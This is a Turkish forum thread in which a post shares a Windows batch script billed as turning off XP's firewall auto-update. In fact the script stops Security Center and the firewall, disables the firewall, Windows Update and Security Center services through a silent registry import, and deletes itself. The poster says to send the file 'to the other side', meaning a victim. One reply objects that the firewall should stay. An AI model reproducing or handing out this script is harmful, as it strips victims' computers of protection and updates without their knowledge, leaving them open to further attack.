Bu program XP nin güvenlik duvarini(firewall) otomatik güncellestirmesini kapatir.
Kullanimi:
ilk olarak çalistirda notepad ' i açiyoruz.daha sonra asagida yazdiklarimi .bat olarak farkli kaydediyoruz
Kod:
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO PCkopat
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0
VE KARŞI TARAFA YOLLUYORUZ
(alıntıdır)
xp de güvenlik duvarı kaldırma
- loveme
- Terabyte1

- Mesajlar: 3845
- Kayıt: 10 Tem 2007, 11:47
- cinsiyet: Erkek
- Teşekkür etti: 1 kez
- Teşekkür edildi: 117 kez
- İletişim:
Re: xp de güvenlik duvarı kaldırma
Güvenlik duvarının sağladıkları var sanırım ve kaldırılmamalı bence...


